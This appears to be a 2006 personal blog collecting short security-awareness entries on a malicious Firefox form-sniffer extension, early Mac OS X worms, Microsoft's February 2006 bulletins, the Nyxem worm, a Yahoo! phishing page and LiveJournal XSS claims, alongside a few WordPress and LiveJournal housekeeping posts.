This is the first entry that is posted using WordPress 2.0. The most obvious changes are in the user interface – sleek, still in the shades of blue, and most formatting commands are now displayed in icons, replacing those text buttons.

Another obvious new feature is the import capability: you can now import entries from Blogger, LiveJournal, and more.

In a recent BugTraq entry, a new attack vector has been discovered – by creating a malicious FireFox extension.

FireFox is getting popular as an alternative browser to the bug-and-malware prone Internet Explorer. It utilizes tabbed browsing, and is customizable through themes and extensions. Now, extensions are executable code. So an attacker can create an innocuous looking extension and entice users to download and install the said extension. Voila!

In the posted description, an HTML form sniffer extension was created. To quote:

FFsniFF is a simple Firefox extension, which transforms your browser into the html form sniffer. Everytime the user click on ‘Submit’ button, FFsniFF will try to find a non-blank password field in the form. If it’s found, entire form (also with URL) is sent to the specified e-mail address.

Scary? Not really. The solution is simple. You should only download and install extensions from the official FireFox themes and extensions site.

One of the myths of the Mac world is that it is impervious to malware attacks. It was almost exactly true, for Mac OS had never been a hard target of malware, which makes it clean. Too bad this clean record has to be broken.

This is already days old, but better late than never.

Two new worms targeting users of Mac OSX version 10.4 are discovered. OSX_LEAP.A spreads via iChat, where a compressed file is sent. The said file contains two files, one of which uses a JPEG icon. This is a classic social engineering technique. The user has to extract the files, and open one of them, for this malware to execute.

The other one, OSX_INQTANA.A, spreads via Bluetooth. It is a proof of concept malware written in Java that exploits a vulnerability described here.

With the Apple transition from Motorola processors to Intel, analysts are predicting more attacks will target the Mac, and security researches will give more time to this.

AV watchers would have observed that almost AV vendors have almost the same names for the two Mac malware.

Symantec descriptions:
*OSX.Leap.A
*OSX.Inqtana.A

Sophos descriptions:
*OSX/Inqtana-A
*OSX/Leap-A

Microsoft has released seven security bulletins for February 2006. Two of them are rated Critical and the rest are rated Important.

MS06-004 is another vulnerability affecting Windows Metafile (WMF) images, which were the subject of a security bulletin last month. MS06-005 is a vulnerability affecting Windows Media Player. Both vulnerabilities allow remote code execution.

MS06-006 is another vulnerability for Windows Media Player, this time for WMP plugin for non- Internet Explorer browsers; this vulnerability allows remote code execution. MS06-007 describes a denial of service vulnerability arising from how Windows handle specially-crafted IGMP packets. MS06-008 is a vulnerability in Windows Web Client service that could allow an attacker to take complete control of a target system. MS06-009 describes a vulnerability that exists in the Windows and Office Korean Input Method Editor that could allow elevation of privileges. MS06-010 discusses how Powerpoint 2000 can disclose information to an attacker.

A summary of these vulnerabilities can be found here. If you are using Microsoft products that are affected by these advisories, please update your software. You can turn on Automatic Updates, or visit the links stated above to download the patches. Take note that some of these vulnerabilities have existing exploits already, so we can never be sure when malware authors will exploit these holes. Good thing there are no zero-day exploit malwares, unlike the WMF brouhaha last month.

Antivirus companies warn users about the dangerous payload of the Grew/Nyxem/Blackmal worm. On February 3, 2006 and on the 3rd month thereafter, or 30 minutes after the computer has been restarted, it is scheduled to delete and overwrite common document files (.DOC, .XLS, .PPT, .ZIP and others) with the string “DATA Error [47 0F 94 93 F4 K5]”.

Also, it disables the mouse and the keyboard, deletes files and registry entries of antivirus products, and closes AV windows so that users can’t use them.

Trend Micro’s description for this worm is here.

Best bet: update your AV product then perform a full scan on all of your hard drives. Back up your important or sensitive documents.

Thanks to Rocky for pointing another desperate attempt to steal Yahoo! login credentials. This link is sent via Yahoo! Messenger. Here’s how the page looks like:

(Click the image to enlarge)

Take note of the URL and the usual Yahoo! Geocities ads at the right.

When a user enters his credentials and clicks on Sign In, the trouble begins. The user is directed at another page of similar nature, only that the pictures are different.

Same link, different page. When you try logging in again, you are directed to an login error message page.

So what happens to the data entered? Now, when you click on Sign In for the first time, Internet Explorer’s status bar displays this:

It is sent to a CGI script! Uh oh. The URL of the CGI script is not apparent when you view the HTML source, since the link was encoded using HTML hexadecimal notation. We can suppose that the CGI script is a mailing script, where it sends the stolen info to an email address which was encoded in the HTML form using the tag. In this image, I highlighted the relevant info that made me arrive at the supposition made earlier.

In the form tag, there is an ACTION attribute, and it is set to a long series of characters in HTML hexadecimal notation. It points to the link you saw in the status bar image. There are four INPUT tags of type HIDDEN – that means these form objects are not visible to the user. Take note of the one whose value is set to a certain email address.

The link was spread via Yahoo! Messenger. Maybe it was a social engineering technique – one user enticing another to send the link. Maybe it was a malware that was somehow capable of interfacing with YM. Checking on the address bar of the browser is no guarantee. There are very good phishing sites that are able to interpose a window so that the true URL is hidden.

Good thing Yahoo! Geocities is ad-supported.

Be careful, again.

In a blog, a group of hackers known as “Bantown” has hacked “900,000 LJ accounts” to demonstrate that LiveJournal (LJ) is susceptible to cross-site scripting (XSS) through JavaScript. As an LJ user, this is troubling. While LJ claims that these holes were plugged, Bantown claims there are several holes still unplugged.

One of LJ’s solution is to use a new user subdomain.

LJ users: either have a backup blog (try Blogspot, or WordPress.com) or back up your entries. As on how to back up your entries: frankly, the only way I know is copy-paste. Also, Multiply has a feature where you can import your LJ blog to your Multiply blog (if you have an account).

The blog entry is here. Said link is also quoted at the LJ Infosec community.

Trying out the LiveJournal Crossposter plugin.

View the cross-post here.

What would you do if you find yourself having bought a new cellphone that was the first and the last in line?

Introducing the Nokia 7710:
Continue reading →

Some people just love stealing Yahoo! accounts. Continue reading →